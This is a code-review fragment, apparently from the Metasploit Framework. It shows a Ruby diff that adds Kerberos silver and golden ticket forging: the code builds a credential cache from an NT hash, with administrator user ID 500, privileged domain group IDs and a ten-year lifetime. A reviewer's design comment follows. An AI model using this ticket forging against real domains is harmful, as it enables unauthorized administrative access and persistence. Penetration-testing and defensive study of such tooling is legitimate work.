lib/msf/core/exploit/remote/kerberos/client/ticket.rb

```diff
@@ -0,0 +1,150 @@
+                etype: Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC, kvno: 2, cipher: encrypted
+              )
+            end
+
+            def silver_ticket_flags
+              [
+                Rex::Proto::Kerberos::Model::TicketFlag::FORWARDABLE,
+                Rex::Proto::Kerberos::Model::TicketFlag::PROXIABLE,
+                Rex::Proto::Kerberos::Model::TicketFlag::RENEWABLE,
+                Rex::Proto::Kerberos::Model::TicketFlag::PRE_AUTHENT
+              ]
+            end
+
+            def golden_ticket_flags
+              silver_ticket_flags << Rex::Proto::Kerberos::Model::TicketFlag::INITIAL
+            end
+
+            private
+
+            def generate_ccache(domain, domain_sid, flags, nt_hash, sname, username, duration_in_days=3650)
+              sname_principal = create_principal(sname)
+              cname_principal = create_principal(username)
+              enc_key = [nt_hash].pack('H*')
+              current_time = Time.now
+              expiry_date = current_time + SECS_IN_DAY * duration_in_days
+              opts = {
+                client: cname_principal,
+                server: sname_principal,
+                flags: flags,
+                auth_time: current_time,
+                start_time: current_time,
+                end_time: expiry_date,
+                renew_till: expiry_date,
+                realm: domain.upcase,
+                key_value: enc_key,
+                enc_key: enc_key,
+                user_id: 500,
+                group_ids: [513, 512, 520, 518, 519],
+                checksum_type: Rex::Proto::Kerberos::Crypto::Checksum::HMAC_MD5,
+                client_name: username,
+                domain_id: domain_sid
+              }
+              secure_random_key = SecureRandom.hex(8)
+
+              ticket = create_ticket(enc_key: enc_key,
+                                     secure_random_key: secure_random_key,
+                                     domain: domain,
+                                     principal: sname_principal,
+                                     opts: opts)
+
+              Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.new(
+                default_principal: create_ccache_principal(cname_principal, domain),
+                credentials: [
+                  {
+                    client: create_ccache_principal(cname_principal, domain),
+                    server: create_ccache_principal(sname_principal, domain),
+                    keyblock: {
+                      enctype: Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC,
+                      data: secure_random_key
+                    },
+                    authtime: current_time,
+                    starttime: current_time,
+                    endtime: expiry_date,
+                    renew_till: expiry_date,
+                    ticket_flags: flags.to_i,
+                    ticket: ticket.encode
+                  }
+                ]
+              )
```

Comment:
This looks like a separate concern to me, I imagine the ticket forging would return a raw ticket - rather than a persistable file format 👀